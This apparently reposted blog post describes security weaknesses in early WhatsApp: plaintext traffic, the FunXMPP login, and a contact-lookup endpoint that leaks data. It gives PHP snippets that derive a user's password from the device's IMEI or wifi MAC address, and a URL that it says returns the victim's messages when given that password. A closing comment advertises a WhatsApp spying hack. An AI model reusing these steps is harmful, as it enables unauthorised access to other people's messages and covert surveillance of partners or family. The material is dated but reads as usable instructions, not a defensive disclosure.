WhatsApp Encryption
You will be surprised to know that until
August 2012, messages sent through the WhatsApp service were not encrypted in
any way, everything was sent in plaintext. That means if you were using Whatsapp
on a public wifi, everything can be captured by anyone else sniffing ont he
wireless network. The latest WhatsApp uses encryption but its this new
encryption is broken . But still, phone number is sent out in plaintext.
The local storage isn’t any different,
you can checkout WhatsApp Database Encryption Project Report
WhatsApp API & Reverse Engineering
If you know XMPP, the same protocol used
by facebook, GTalk, and several others, you can try your hands-on WhatsAPI , an
API for WhatsApp messenger.
WhatsApp uses customized XMPP server with
proprietary extensions, named internally as FunXMPP.
1. WhatsApp Authentication / Login
Mechanism
Just like any other XMPP, WhatsApp uses
jabber id and password to login. The password is hashed, stored in servers upon
account creation and used transparently everytime the client connects the
server.
Its an incredibly horrible
implementation. As researcher found out, the username is the user’s phone
number – an attacker would probably already knows the victim’s number.
On Android, the password is a md5 hash of the reversed IMEI number :
$imei =
"112222223333334"; //
example IMEI
$androidWhatsAppPassword =
md5(strrev($imei)); // reverse
IMEI and calculate md5 hash
On iOS, the password
is generated from the devices WLAN MAC address:
$wlanMAC =
"AA:BB:CC:DD:EE:FF";
// example
WLAN MAC address
$iphoneWhatsAppPassword =
md5($wlanMAC.$wlanMAC); //
calculate md5 hash using the
MAC
address twice
Both IMEI and MAC address are easily
retrievable from devices if you have physical access to it. MAC address is much
easier to
capture as you can sniff on the wireless
network to which iOS device is connected.
The JID is a concatenation between your
country’s code and mobile number.
Initial login uses Digest Access
Authentication.
You can try this for yourself:
https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password
$countrycode = the country
calling code
$phonenumber = the users phone
number (without the country calling code)
$password = see above, for
iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei))
The response you would receive would be
in XML, containing messages designated for your phone.
2. Text Message communication
Messages are basically sent as TCP
packets, following WhatsApp’s own format (unlike what’s defined in XMPP RFCs).
Photos, Videos and Audio files shared
with WhatsApp contacts are HTTP-uploaded to a server before being sent to the
recipient(s) along with Base64 thumbnail of media file (if applicable) along
with the generated HTTP link as the message body.
WhatsApp Privacy Leak
WhatsApp shares your contacts with the
server, we all know that. But the way it is done is ridiculously insecure. It
basically sends contact information as:
https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4
The server response looks like:
--
<?xml version="1.0"
encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC
"-//Apple//
DTD PLIST 1.0//EN" "http://
www.apple.com/DTDs/
PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>P</key>
<string>1234567890</string>
<key>T</key>
<integer>10817</integer>
<key>S</key>
<string>Some Status Message</
string>
<key>JID</key>
<string>23xxxxxxxxx</string>
<key>NP</key>
<true/>
</dict>
</array>
</plist>
--
Key “P” is the users phone number, Key
“T”
seems to be the uptime(?), Key “S” is the
users
status message. Not sure about “JID” and
“NP”
yet – if you have smart guess let me
know. All
this information is public.
Source: Geeknizer
Get the newest Whatsapp Hack V2 and spy on your love one!
ReplyDelete